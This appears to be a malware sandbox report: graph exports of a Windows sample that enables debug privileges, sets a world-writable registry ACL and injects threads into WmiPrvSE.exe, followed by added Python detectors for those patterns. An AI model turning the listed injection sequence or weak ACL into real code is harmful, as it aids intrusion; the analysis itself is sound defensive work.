5977->6003 5979 140008da7 5978->5979 5980 140006e64 __free_lconv_num 5 API calls 5978->5980 5981 140008db9 5979->5981 5982 140006e64 __free_lconv_num 5 API calls 5979->5982 5980->5979 5983 140008dcb 5981->5983 5984 140006e64 __free_lconv_num 5 API calls 5981->5984 5982->5981 5985 140008ddd 5983->5985 5986 140006e64 __free_lconv_num 5 API calls 5983->5986 5984->5983 5988 140008def 5985->5988 5989 140006e64 __free_lconv_num 5 API calls 5985->5989 
5986->5985 5987 140008e01 5991 140008e13 5987->5991 5992 140006e64 __free_lconv_num 5 API calls 5987->5992 5988->5987 5990 140006e64 __free_lconv_num 5 API calls 5988->5990 5989->5988 5990->5987 5993 140008e25 5991->5993 5994 140006e64 __free_lconv_num 5 API calls 5991->5994 5992->5991 5995 140008e37 5993->5995 5996 140006e64 __free_lconv_num 5 API calls 5993->5996 5994->5993 5997 140008e49 5995->5997 5999 140006e64 __free_lconv_num 5 API calls 5995->5999 5996->5995 5998 140008e5e 5997->5998 6000 140006e64 __free_lconv_num 5 API calls 5997->6000 6001 140008e73 5998->6001 6002 140006e64 __free_lconv_num 5 API calls 5998->6002 5999->5997 6000->5998 6001->6003 6004 140006e64 __free_lconv_num 5 API calls 6001->6004 6002->6001 6003->5962 6004->6003 6006 140008e95 6005->6006 6015 140008ef6 6005->6015 6007 140008eae 6006->6007 6008 140006e64 __free_lconv_num 5 API calls 6006->6008 6009 140008ec0 6007->6009 6010 140006e64 __free_lconv_num 5 API calls 6007->6010 6008->6007 6011 140006e64 __free_lconv_num 5 API calls 6009->6011 6012 140008ed2 6009->6012 6010->6009 6011->6012 6013 140006e64 __free_lconv_num 5 API calls 6012->6013 6014 140008ee4 6012->6014 6013->6014 6014->6015 6016 140006e64 __free_lconv_num 5 API calls 6014->6016 6015->5959 6016->6015 6018 140009620 6017->6018 6019 1400095f5 6017->6019 6018->5964 6019->6018 6023 140008f54 6019->6023 6022 140006e64 __free_lconv_num 5 API calls 6022->6018 6024 14000904c 6023->6024 6025 140008f5d 6023->6025 6024->6022 6059 140008efc 6025->6059 6028 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6029 140008f86 6028->6029 6030 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6029->6030 6031 140008f94 6030->6031 6032 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6031->6032 6033 140008fa2 6032->6033 6034 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6033->6034 6035 140008fb1 6034->6035 6036 140006e64 __free_lconv_num 5 API calls 
6035->6036 6037 140008fbd 6036->6037 6038 140006e64 __free_lconv_num 5 API calls 6037->6038 6039 140008fc9 6038->6039 6040 140006e64 __free_lconv_num 5 API calls 6039->6040 6041 140008fd5 6040->6041 6042 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6041->6042 6043 140008fe3 6042->6043 6044 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6043->6044 6045 140008ff1 6044->6045 6046 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6045->6046 6047 140008fff 6046->6047 6048 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6047->6048 6049 14000900d 6048->6049 6050 140008efc Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6049->6050 6051 14000901c 6050->6051 6052 140006e64 __free_lconv_num 5 API calls 6051->6052 6053 140009028 6052->6053 6054 140006e64 __free_lconv_num 5 API calls 6053->6054 6055 140009034 6054->6055 6056 140006e64 __free_lconv_num 5 API calls 6055->6056 6057 140009040 6056->6057 6058 140006e64 __free_lconv_num 5 API calls 6057->6058 6058->6024 6060 140008f44 6059->6060 6061 140008f30 6059->6061 6060->6028 6061->6060 6062 140006e64 __free_lconv_num 5 API calls 6061->6062 6062->6061 6092 140009948 6063->6092 6065 140005b11 6065->5895 6066 1400099e0 6065->6066 6067 140009a08 6066->6067 6069 140009a29 6066->6069 6068 140006120 _invalid_parameter_noinfo 5 API calls 6067->6068 6067->6069 6073 140009a1c 6067->6073 6068->6073 6071 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6069->6071 6077 140009b00 6069->6077 6070 140009a66 6070->5895 6071->6077 6072 140009aa6 6074 14000663c _set_fmode 5 API calls 6072->6074 6073->6069 6073->6070 6073->6072 6075 140009aab 6074->6075 6095 140006460 6075->6095 6078 140009c33 6077->6078 6082 140009b71 6077->6082 6098 140005fa4 6077->6098 6081 140005fa4 21 API calls 6081->6082 6083 140005fa4 21 API calls 6082->6083 6083->6082 6085 140006286 __scrt_fastfail 6084->6085 6086 1400062ae 
RtlCaptureContext RtlLookupFunctionEntry 6085->6086 6087 1400062e8 RtlVirtualUnwind 6086->6087 6088 14000631e IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6086->6088 6087->6088 6089 140006370 __scrt_fastfail 6088->6089 6131 140002200 6089->6131 6093 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6092->6093 6094 140009961 6093->6094 6094->6065 6125 1400063b0 6095->6125 6097 140006479 6097->6070 6099 140005fb9 try_get_function 6098->6099 6100 140005fcb 6099->6100 6101 1400069e8 _invalid_parameter_noinfo 2 API calls 6099->6101 6102 140006a30 _invalid_parameter_noinfo GetProcAddress 6100->6102 6104 140005fd3 SetLastError 6100->6104 6101->6100 6103 140005fee 6102->6103 6103->6104 6106 140006dec _invalid_parameter_noinfo 5 API calls 6103->6106 6107 140006072 6104->6107 6108 140006062 6104->6108 6109 140006001 6106->6109 6110 140005b08 20 API calls 6107->6110 6108->6081 6111 14000601f 6109->6111 6112 14000600f 6109->6112 6113 140006077 6110->6113 6114 140006a30 _invalid_parameter_noinfo GetProcAddress 6111->6114 6115 140006a30 _invalid_parameter_noinfo GetProcAddress 6112->6115 6117 140006027 6114->6117 6116 140006016 6115->6116 6120 140006e64 __free_lconv_num 5 API calls 6116->6120 6118 14000602b 6117->6118 6119 14000603d 6117->6119 6121 140006a30 _invalid_parameter_noinfo GetProcAddress 6118->6121 6122 140005d54 _invalid_parameter_noinfo 5 API calls 6119->6122 6120->6104 6121->6116 6123 140006045 6122->6123 6124 140006e64 __free_lconv_num 5 API calls 6123->6124 6124->6104 6126 140006120 _invalid_parameter_noinfo 5 API calls 6125->6126 6127 1400063d5 6126->6127 6128 1400063e6 __vcrt_FlsSetValue 6127->6128 6129 1400063b0 _invalid_parameter_noinfo 5 API calls 6127->6129 6128->6097 6130 140006479 6129->6130 6130->6097 6132 14000220a 6131->6132 6133 140002510 IsProcessorFeaturePresent 6132->6133 6134 140002216 6132->6134 6135 140002527 6133->6135 6134->5897 6140 140002704 RtlCaptureContext 6135->6140 6141 14000271e 
RtlLookupFunctionEntry 6140->6141 6142 140002734 RtlVirtualUnwind 6141->6142 6143 14000253a 6141->6143 6142->6141 6142->6143 6144 1400024dc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6143->6144 6146 140008133 6145->6146 6147 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6146->6147 6149 14000813d 6146->6149 6151 140008150 6147->6151 6148 1400081af 6148->5852 6149->6148 6150 140005b08 21 API calls 6149->6150 6152 1400081c7 6150->6152 6151->6149 6153 140006e64 __free_lconv_num 5 API calls 6151->6153 6154 14000821a 6152->6154 6155 140006078 21 API calls 6152->6155 6153->6149 6154->5852 6156 140008204 6155->6156 6157 140007f4c 30 API calls 6156->6157 6157->6154 6195 1400043a0 6158->6195 6161 140007c78 GetOEMCP 6164 140007c9f 6161->6164 6162 140007c8a 6163 140007c8f GetACP 6162->6163 6162->6164 6163->6164 6164->5855 6165 140006d8c 6164->6165 6166 140006dd7 6165->6166 6169 140006d9b _invalid_parameter_noinfo 6165->6169 6167 14000663c _set_fmode 5 API calls 6166->6167 6168 140006dd5 6167->6168 6168->5857 6171 140008244 6168->6171 6169->6166 6169->6168 6170 140004714 _invalid_parameter_noinfo EnterCriticalSection 6169->6170 6170->6169 6172 140007c58 23 API calls 6171->6172 6173 14000826f 6172->6173 6175 1400082ac IsValidCodePage 6173->6175 6180 1400082ef __scrt_fastfail 6173->6180 6174 140002200 _handle_error 8 API calls 6176 14000802f 6174->6176 6177 1400082bd 6175->6177 6175->6180 6176->5862 6176->5865 6178 1400082f4 GetCPInfo 6177->6178 6181 1400082c6 __scrt_fastfail 6177->6181 6178->6180 6178->6181 6180->6174 6228 140007d68 6181->6228 6183 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6182->6183 6184 140007ab8 __scrt_fastfail 6183->6184 6185 140007adb __scrt_fastfail 6184->6185 6186 14000663c _set_fmode 5 API calls 6184->6186 6189 14000663c _set_fmode 5 API calls 6185->6189 6192 140007b83 6185->6192 6187 140007b4a 6186->6187 6188 140006460 
_invalid_parameter_noinfo 5 API calls 6187->6188 6188->6185 6190 140007be1 6189->6190 6191 140006460 _invalid_parameter_noinfo 5 API calls 6190->6191 6191->6192 6193 140007c1d 6192->6193 6194 140006e64 __free_lconv_num 5 API calls 6192->6194 6193->5857 6194->6193 6196 1400043c4 6195->6196 6197 1400043bf 6195->6197 6196->6197 6198 140005fa4 21 API calls 6196->6198 6197->6161 6197->6162 6199 1400043df 6198->6199 6203 14000665c 6199->6203 6204 140004402 6203->6204 6205 140006671 6203->6205 6207 140006690 6204->6207 6205->6204 6211 1400096f8 6205->6211 6208 1400066a5 6207->6208 6209 1400066b8 6207->6209 6208->6209 6225 140008228 6208->6225 6209->6197 6212 140005fa4 21 API calls 6211->6212 6213 140009707 6212->6213 6214 140009750 6213->6214 6215 140006d1c Concurrency::details::SchedulerProxy::DeleteThis EnterCriticalSection 6213->6215 6214->6204 6216 14000972e 6215->6216 6221 140009764 6216->6221 6218 14000973e 6218->6214 6219 140005b08 21 API calls 6218->6219 6220 140009763 6219->6220 6222 140009783 6221->6222 6223 140009776 Concurrency::details::SchedulerProxy::DeleteThis 6221->6223 6222->6218 6223->6222 6224 140009450 Concurrency::details::SchedulerProxy::DeleteThis 5 API calls 6223->6224 6224->6222 6226 140005fa4 21 API calls 6225->6226 6227 140008231 6226->6227 6229 140007da5 GetCPInfo 6228->6229 6230 140007e9d 6228->6230 6229->6230 6235 140007db8 6229->6235 6231 140002200 _handle_error 8 API calls 6230->6231 6232 140007f36 6231->6232 6232->6180 6239 140009234 6235->6239 6240 1400043a0 21 API calls 6239->6240 6241 140009276 6240->6241 6259 1400085b4 6241->6259 6260 1400085bc MultiByteToWideChar 6259->6260 6262 14000e360 6260->6262 6305 140001ac9 lstrcpyW lstrcatW 6304->6305 6306 140001cf4 6304->6306 6307 140001b17 __scrt_is_managed_app 6305->6307 6306->5747 6308 140001b23 GetCurrentProcess K32GetModuleInformation 6307->6308 6312 140001ccb try_get_function 6307->6312 6309 140001b57 CreateFileW 6308->6309 6308->6312 6311 140001b96 CreateFileMappingW 6309->6311 
Call graph export (the rendered graph is not reproduced; the plugin's node/edge listing for this memory dump is summarised here by function). Functions and API calls recoverable from the listing:
• 140001bc7-140001cba: MapViewOfFile, lstrcmpiA, VirtualProtect (at 140001c52 and, via 140003ea0, at 140001c84), CloseHandle
• 140001d00: K32EnumProcesses, OpenProcess, K32EnumProcessModules, ReadProcessMemory, CloseHandle
• 140002120: K32EnumProcesses in a Sleep loop (1400021e4), calling 140001420 / 140001430
• 140001420 / 140001430: OpenProcess, IsWow64Process, CloseHandle, OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, NtQueryInformationProcess, OpenProcessToken, GetTokenInformation, LocalAlloc, GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree, VirtualAllocEx, WriteProcessMemory, GetModuleHandleA, GetProcAddress, NtCreateThreadEx, WaitForSingleObject, GetExitCodeThread, CloseHandle
• 140003600: RtlPcToFileHeader, RaiseException (reached from the std::bad_alloc and Concurrency::cancel_current_task paths at 1400028c4 / 1400028e4)
• remaining nodes: CRT and VCRT runtime helpers (_handle_error, _invalid_parameter_noinfo, _set_fmode, __free_lconv_num, try_get_function, __vcrt_FlsSetValue, __vcrt_uninitialize_locks, __vcrt_uninitialize_ptd, _log10_special, _set_errno_from_matherr) calling WriteFile, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, CreateFileW, WriteConsoleW, SetFilePointerEx, SetStdHandle, GetProcAddress, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount and RaiseException

                            Control-flow Graph

                            Basic blocks of 140001000 (API calls and sub-calls per block; → lists successor blocks):
                            • 0 140001000-1400010fc: call 140001ac0, call 1400037b0, VerSetConditionMask * 3, VerifyVersionInfoW, call 140001ac0, call 140004680, call 140004388, call 14000e1c0, OpenProcess → 13, 14
                            • 13 14000117b-140001195: FindResourceA → 17, 18
                            • 14 1400010fe-140001113: OpenProcessToken → 15, 16
                            • 15 140001172-140001175: CloseHandle → 13
                            • 16 140001115-14000112b: LookupPrivilegeValueW → 15, 19
                            • 17 14000119b-1400011ae: SizeofResource → 18, 21
                            • 18 1400013ed-14000141e: call 140002200
                            • 19 14000112d-14000116a: AdjustTokenPrivileges → 15, 22
                            • 21 1400011b4-1400011c2: LoadResource → 18, 24
                            • 22 14000116c: call 14000e088 → 15
                            • 24 1400011c8-140001205: LockResource, call 14000e1c0, call 140002268, call 140001d00 → 32, 33
                            • 32 140001207-14000120d → 33, 34
                            • 33 140001260-1400012a5: call 140002224, RegCreateKeyExW → 40, 41
                            • 34 14000120f-14000121a → 36
                            • 36 140001220-140001225 → 38, 39
                            • 38 140001256-14000125e → 33, 36
                            • 39 140001227-14000122d → 38, 43
                            • 40 1400012ab-1400012d1: ConvertStringSecurityDescriptorToSecurityDescriptorW → 44, 45
                            • 41 14000137d-1400013eb: CreateThread, call 14000222c, CreateThread, Sleep, SleepEx → 18
                            • 43 14000122f-140001240: OpenProcess → 38, 49
                            • 44 1400012f3-14000132e: RegCreateKeyExW → 46, 47
                            • 45 1400012d3-1400012ed: RegSetKeySecurity, LocalFree → 44
                            • 46 140001372-140001377: RegCloseKey → 41
                            • 47 140001330-14000136c: call 14000e1c0, RegSetValueExW, RegCloseKey → 46
                            • 49 140001242-140001250: TerminateProcess, CloseHandle → 38
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$CloseCreate$Handle$CurrentResource$ConditionFileMaskOpenSecurity$DescriptorFreeModuleProtectThreadTokenValueVirtual$AdjustConvertErrorFindInfoInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringTerminateVerifyVersionViewlstrcatlstrcmpilstrcpy
                            • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\nslookconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                            • API String ID: 1509639794-2014806160
                            • Opcode ID: ac2b49ce81bd6c42ce1db7e27b1c3ae78d14c7ed4c748a7f7454255202cddb2a
                            • Instruction ID: bf23c630407f85a7ea5e16fea4e65b4f13d99ae9d65eda87c83af15c2995c556
                            • Opcode Fuzzy Hash: ac2b49ce81bd6c42ce1db7e27b1c3ae78d14c7ed4c748a7f7454255202cddb2a
                            • Instruction Fuzzy Hash: D4B104B2204B8086EB16DF62F8447DA73A5F78CBC4F444529EB8A57BA4DF79C548CB40
                            Uniqueness

                            Uniqueness Score: -1.00%
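The 140001000 graph above shows RegCreateKeyExW followed by ConvertStringSecurityDescriptorToSecurityDescriptorW and RegSetKeySecurity, and its strings include SOFTWARE\nslookconfig and the SDDL D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA). Read as a DACL, that string grants GENERIC_ALL, inheritable, to Authenticated Users (AU) as well as to Administrators (BA); if it is the descriptor applied to the key (the report shows the string and the calls, not which argument receives it), any authenticated user can rewrite whatever the sample stores under that key. The block below is an added example, not code from the report or from the sample: a small SDDL DACL parser that flags ACEs giving a broad principal write-level rights. The WRITE_RIGHTS and BROAD_PRINCIPALS sets are the editor's choice, and HARDENED_SDDL is a constructed contrast, not a string from the report.

```python
import re

# SDDL two-letter codes (a subset of the documented tables, enough for registry and file DACLs).
ACE_TYPES = {"A": "ACCESS_ALLOWED", "D": "ACCESS_DENIED", "AU": "SYSTEM_AUDIT",
             "OA": "OBJECT_ACCESS_ALLOWED", "OD": "OBJECT_ACCESS_DENIED"}
ACE_FLAGS = {"OI": "OBJECT_INHERIT", "CI": "CONTAINER_INHERIT", "NP": "NO_PROPAGATE_INHERIT",
             "IO": "INHERIT_ONLY", "ID": "INHERITED", "SA": "SUCCESSFUL_ACCESS", "FA": "FAILED_ACCESS"}
RIGHTS = {"GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
          "RC": "READ_CONTROL", "SD": "DELETE", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
          "KA": "KEY_ALL_ACCESS", "KR": "KEY_READ", "KW": "KEY_WRITE", "KX": "KEY_EXECUTE",
          "FA": "FILE_ALL_ACCESS", "FR": "FILE_GENERIC_READ", "FW": "FILE_GENERIC_WRITE",
          "FX": "FILE_GENERIC_EXECUTE"}
TRUSTEES = {"AU": "Authenticated Users", "BA": "Builtin Administrators", "BU": "Builtin Users",
            "SY": "Local System", "WD": "Everyone", "AN": "Anonymous", "IU": "Interactive Users",
            "LS": "Local Service", "NS": "Network Service", "CO": "Creator Owner"}

# Editor's choice: rights that let the holder modify the object or its DACL, and
# principals that in practice mean "any user on the box".
WRITE_RIGHTS = {"GA", "GW", "WD", "WO", "SD", "KA", "KW", "FA", "FW"}
BROAD_PRINCIPALS = {"AU", "BU", "WD", "AN", "IU"}

# Copied from the report's strings table for the 140001000 function.
REPORT_SDDL = "D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)"
# Constructed contrast (not from the report): authenticated users get read-only access.
HARDENED_SDDL = "D:(A;OICI;KR;;;AU)(A;OICI;KA;;;BA)"


def _codes(field, table, what):
    """Split a run of two-letter SDDL codes ("OICI" -> ["OI", "CI"]) and validate against `table`."""
    if len(field) % 2:
        raise ValueError(f"odd-length {what} field: {field!r}")
    codes = [field[i:i + 2] for i in range(0, len(field), 2)]
    bad = [c for c in codes if c not in table]
    if bad:
        raise ValueError(f"unknown {what} codes {bad} in {field!r}")
    return codes


def parse_dacl(sddl):
    """Parse the D: component of an SDDL string into a list of ACE dicts."""
    m = re.search(r"D:(?P<flags>(?:P|AI|AR)*)(?P<aces>(?:\([^)]*\))*)", sddl)
    if not m or not m.group("aces"):
        raise ValueError("no DACL ACEs found")
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group("aces")):
        fields = body.split(";")
        if len(fields) != 6:
            raise ValueError(f"ACE must have 6 fields: {body!r}")
        ace_type, flags, rights, _obj_guid, _inh_guid, trustee = fields
        if ace_type not in ACE_TYPES:
            raise ValueError(f"unknown ACE type {ace_type!r}")
        # Rights may be a raw hex mask instead of codes; keep the mask string in that case.
        right_codes = [rights] if rights.lower().startswith("0x") else _codes(rights, RIGHTS, "rights")
        aces.append({
            "type": ACE_TYPES[ace_type],
            "flags": [ACE_FLAGS[c] for c in _codes(flags, ACE_FLAGS, "flags")],
            "rights_codes": right_codes,
            "rights": [RIGHTS.get(c, c) for c in right_codes],
            "trustee_code": trustee,
            "trustee": TRUSTEES.get(trustee, trustee),  # literal SIDs pass through unchanged
        })
    return aces


def is_weak(ace):
    """True when an allow ACE hands a broad principal write-level rights."""
    return (ace["type"] == "ACCESS_ALLOWED"
            and ace["trustee_code"] in BROAD_PRINCIPALS
            and bool(set(ace["rights_codes"]) & WRITE_RIGHTS))


def weak_aces(sddl):
    return [a for a in parse_dacl(sddl) if is_weak(a)]


def describe(sddl):
    """One human-readable line per ACE, prefixed WEAK or ok."""
    return [f"{'WEAK ' if is_weak(a) else 'ok   '}{a['type']} {'+'.join(a['rights'])} "
            f"-> {a['trustee']} [{','.join(a['flags'])}]" for a in parse_dacl(sddl)]


if __name__ == "__main__":
    for label, sddl in (("report", REPORT_SDDL), ("hardened", HARDENED_SDDL)):
        print(label)
        for line in describe(sddl):
            print("  " + line)
```

For a live key the same check can be run against the output of Get-Acl or ConvertSecurityDescriptorToStringSecurityDescriptor; the parser above only looks at the DACL and ignores owner, group and SACL components.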

                            Control-flow Graph

                            Basic blocks of 140001420 (API calls and sub-calls per block; → lists successor blocks):
                            • 53 140001420-140001496: OpenProcess → 55, 56
                            • 55 140001761 → 59
                            • 56 14000149c-1400014af: IsWow64Process → 57, 58
                            • 57 1400014b5-1400014c7: CloseHandle → 55, 60
                            • 58 14000175b: CloseHandle → 55
                            • 59 140001763-14000178e: call 140002200
                            • 60 1400014cd-1400014e3: OpenProcess → 55, 63
                            • 63 1400014e9-140001501: K32GetModuleFileNameExW → 64, 65
                            • 64 140001503-14000151f: PathFindFileNameW, call 14000447c → 59, 65
                            • 65 140001525-140001544: NtQueryInformationProcess → 67, 68
                            • 67 140001758 → 58
                            • 68 14000154a-14000154e → 67, 70
                            • 70 140001554-140001574: OpenProcessToken → 71, 72
                            • 71 14000157a-14000159b: GetTokenInformation → 73, 74
                            • 72 140001750 → 67
                            • 73 14000161b → 76
                            • 74 14000159d-1400015a6: call 14000e088 → 73, 79
                            • 76 14000161f-14000162d: CloseHandle → 72, 78
                            • 78 140001633-140001639 → 72, 80
                            • 79 1400015a8-1400015ba: LocalAlloc → 73, 81
                            • 80 14000163f-14000164b: call 140001790 → 72, 86
                            • 81 1400015bc-1400015e0: GetTokenInformation → 83, 84
                            • 83 1400015e2-14000160a: GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree → 76
                            • 84 14000160c-140001619: LocalFree → 76
                            • 86 140001651-140001673: VirtualAllocEx → 72, 87
                            • 87 140001679-140001692: WriteProcessMemory → 72, 88
                            • 88 140001698-1400016ad: GetModuleHandleA → 89, 90
                            • 89 1400016c4 → 91
                            • 90 1400016af-1400016c2: GetProcAddress → 91
                            • 91 1400016c7-140001702: NtCreateThreadEx → 72, 92
                            • 92 140001704-14000170c → 72, 93
                            • 93 14000170e-140001711 → 94, 95
                            • 94 140001713-140001718 → 96
                            • 95 14000171a-140001727: WaitForSingleObject → 97, 98
                            • 96 14000174a: CloseHandle → 72
                            • 97 140001745 → 96
                            • 98 140001729-14000173b: GetExitCodeThread → 97, 99
                            • 99 14000173d-140001741 → 97
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000027.00000002.544994999.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_39_2_140000000_dllhost.jbxd
                            Similarity
                            • API ID: Process$Handle$Close$InformationLocalOpenToken$AllocAuthorityFileFreeModuleNameThread$AddressCodeCountCreateErrorExitFindLastMemoryObjectPathProcQuerySingleVirtualWaitWow64Write_invalid_parameter_noinfo
                            • String ID: @$NtCreateThreadEx$WmiPrvSE.exe$ntdll.dll
                            • API String ID: 3771203008-3049825241
                            • Opcode ID: 3514cc253bb78093fad6e6cd81122fcc17cc3d12463bdd0a6adf7bd84e0f1cd2
                            • Instruction ID: 0752c1ec2196954d4dd78b877c8bc8e9b8eaac9fa95afa931e72f9c214f7cb11
                            • Opcode Fuzzy Hash: 3514cc253bb78093fad6e6cd81122fcc17cc3d12463bdd0a6adf7bd84e0f1cd2
                            • Instruction Fuzzy Hash: 059115B5208B8082EB26DF13B8547DA67A1FBC8BC4F444425EB8A57BA4DF78C545C740
                            Uniqueness

                            Uniqueness Score: -1.00%
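The 140001420 graph above lists OpenProcess, IsWow64Process, K32GetModuleFileNameExW, NtQueryInformationProcess, OpenProcessToken and GetTokenInformation with GetSidSubAuthorityCount/GetSidSubAuthority (the pattern typically used to read a token's integrity level), and then VirtualAllocEx, WriteProcessMemory, GetModuleHandleA/GetProcAddress and NtCreateThreadEx, with WmiPrvSE.exe and ntdll.dll among its strings: the remote-thread injection sequence, with the thread-creation export resolved at run time. Presence of those names in one function is a weaker signal than the order in which they can execute, and the token stream the IDA plugin exports for each graph (node id, address or address range, labels, then a->b edges) is regular enough to check that mechanically. Below is an added example, not code from the report or from the sample, that parses that export and asks whether the chain is reachable along CFG edges, not merely present. REPORT_CFG is the 140001420 graph copied verbatim from the report; INJECTION_CHAIN and the token grammar assumed by parse_cfg are the editor's choice.

```python
import re
from collections import defaultdict, deque

# The 140001420 graph, copied verbatim from the report's control_flow_graph export
# (whitespace separated: node id, address or address range, labels, and "a->b" edges).
REPORT_CFG = """control_flow_graph 53 140001420-140001496 OpenProcess 55 140001761 53->55
56 14000149c-1400014af IsWow64Process 53->56 59 140001763-14000178e call 140002200 55->59
57 1400014b5-1400014c7 CloseHandle 56->57 58 14000175b CloseHandle 56->58 57->55
60 1400014cd-1400014e3 OpenProcess 57->60 58->55 60->55
63 1400014e9-140001501 K32GetModuleFileNameExW 60->63
64 140001503-14000151f PathFindFileNameW call 14000447c 63->64
65 140001525-140001544 NtQueryInformationProcess 63->65 64->59 64->65
67 140001758 65->67 68 14000154a-14000154e 65->68 67->58 68->67
70 140001554-140001574 OpenProcessToken 68->70 71 14000157a-14000159b GetTokenInformation 70->71
72 140001750 70->72 73 14000161b 71->73 74 14000159d-1400015a6 call 14000e088 71->74 72->67
76 14000161f-14000162d CloseHandle 73->76 74->73 79 1400015a8-1400015ba LocalAlloc 74->79 76->72
78 140001633-140001639 76->78 78->72 80 14000163f-14000164b call 140001790 78->80 79->73
81 1400015bc-1400015e0 GetTokenInformation 79->81 80->72 86 140001651-140001673 VirtualAllocEx 80->86
83 1400015e2-14000160a GetSidSubAuthorityCount GetSidSubAuthority LocalFree 81->83
84 14000160c-140001619 LocalFree 81->84 83->76 84->76 86->72
87 140001679-140001692 WriteProcessMemory 86->87 87->72 88 140001698-1400016ad GetModuleHandleA 87->88
89 1400016c4 88->89 90 1400016af-1400016c2 GetProcAddress 88->90
91 1400016c7-140001702 NtCreateThreadEx 89->91 90->91 91->72 92 140001704-14000170c 91->92 92->72
93 14000170e-140001711 92->93 94 140001713-140001718 93->94 95 14000171a-140001727 WaitForSingleObject 93->95
96 14000174a CloseHandle 94->96 97 140001745 95->97 98 140001729-14000173b GetExitCodeThread 95->98
96->72 97->96 98->97 99 14000173d-140001741 98->99 99->97"""

# Editor's choice: the injection primitives in the order they must execute.
# A CreateRemoteThread variant would swap the last entry.
INJECTION_CHAIN = ["OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "NtCreateThreadEx"]

ADDR = re.compile(r"^[0-9a-fA-F]{8,16}(?:-[0-9a-fA-F]{8,16})?$")
EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d{1,6}$")  # short decimal; addresses are 8+ hex digits


def parse_cfg(text):
    """Return (nodes, edges): nodes[id] = {start, end, labels}; edges[src] = [dst, ...]."""
    toks = text.split()
    nodes, edges, cur, i = {}, defaultdict(list), None, 0
    while i < len(toks):
        tok = toks[i]
        m = EDGE.match(tok)
        if m:
            edges[int(m.group(1))].append(int(m.group(2)))
        elif NODE_ID.match(tok) and i + 1 < len(toks) and ADDR.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")
            cur = int(tok)
            nodes[cur] = {"start": int(lo, 16), "end": int(hi or lo, 16), "labels": []}
            i += 1  # the address token was consumed as well
        elif cur is not None:
            nodes[cur]["labels"].append(tok)  # API name, "call <addr>", or "* N" repeat mark
        i += 1
    return nodes, dict(edges)


def api_calls(node):
    """API names in a block; drops 'call <addr>' sub-calls and '* N' repeat counts."""
    out, skip = [], False
    for lab in node["labels"]:
        if skip:
            skip = False
        elif lab in ("call", "*"):
            skip = True
        else:
            out.append(lab)
    return out


def reachable(edges, start):
    """Blocks reachable from `start` along CFG edges, including `start` itself."""
    seen, todo = {start}, deque([start])
    while todo:
        n = todo.popleft()
        for m in edges.get(n, ()):
            if m not in seen:
                seen.add(m)
                todo.append(m)
    return seen


def find_api_chain(nodes, edges, chain):
    """Blocks calling chain[0], chain[1], ... with each reachable from the previous one.
    Returns [(api, block start address), ...] along one consistent path, or None."""
    where = defaultdict(list)
    for nid, node in nodes.items():
        for api in api_calls(node):
            where[api].append(nid)
    layers = [{nid: None for nid in where.get(chain[0], [])}]
    if not layers[0]:
        return None
    for api in chain[1:]:
        targets, layer = set(where.get(api, [])), {}
        for src in layers[-1]:
            for dst in reachable(edges, src):
                if dst in targets and dst not in layer:
                    layer[dst] = src  # remember the predecessor for backtracking
        if not layer:
            return None
        layers.append(layer)
    nid, path = min(layers[-1]), []
    for api, layer in zip(reversed(chain), reversed(layers)):
        path.append((api, nodes[nid]["start"]))
        nid = layer[nid]
    return path[::-1]


if __name__ == "__main__":
    nodes, edges = parse_cfg(REPORT_CFG)
    for api, addr in find_api_chain(nodes, edges, INJECTION_CHAIN) or []:
        print(f"{api:20s} at {addr:#x}")
```

The same parser applies to the other control_flow_graph exports in this report; swapping INJECTION_CHAIN for, say, ["OpenProcessToken", "AdjustTokenPrivileges"] or ["RegCreateKeyExW", "RegSetKeySecurity"] checks the 140001000 graph for the privilege and registry-ACL sequences instead.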

                            Control-flow Graph

                            Basic blocks of 140001430 (API calls and sub-calls per block; → lists successor blocks):
                            • 100 140001430-140001496: OpenProcess → 102, 103
                            • 102 140001761 → 106
                            • 103 14000149c-1400014af: IsWow64Process → 104, 105
                            • 104 1400014b5-1400014c7: CloseHandle → 102, 107
                            • 105 14000175b: CloseHandle → 102
                            • 106 140001763-14000178e: call 140002200
